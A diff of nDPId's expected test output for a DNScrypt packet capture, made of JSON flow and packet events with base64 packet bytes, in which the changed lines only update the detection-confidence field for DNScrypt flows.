00576{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","packets-captured":16,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":7056,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":6,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":946739299327} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFypAAL0R8NAKAAABPtK0R8c8BB0CCLXvBycBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":51004,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFytAAL0R8M8KAAABPtK0R82cBB0CCLXvByMBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00600{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01140{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAIcFyxAAL0R8M4KAAABPtK0R8FuBB0CCLXvByUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":49518,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy0gAL0RDQ4KAAABPtK0R6rkBB0GBCq4ByYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":43748,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":20,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739299327} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":20,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy0Aub0RMeEKAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy4gAL0RDQ0KAAABPtK0R+AzBB0GBPVqByQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00662{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":21,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":57395,"dst_port":1053,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00224{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":22,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739299327} 00419{"packet_event_id":1,"packet_event_name":"packet","packet_id":22,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAABQFy4Aub0RMeAKAAABPtK0RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739299327,"flow_last_seen":946739299327,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739299327,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":53299,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02424{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":946739299327,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739299327,"pkt":"REREREREZmZmZmZmCABFAAXcFy8gAL0RDQwKAAABPtK0R9AzBB0GBAVtByIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczIIaXJpc2VkZW4CZnIAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA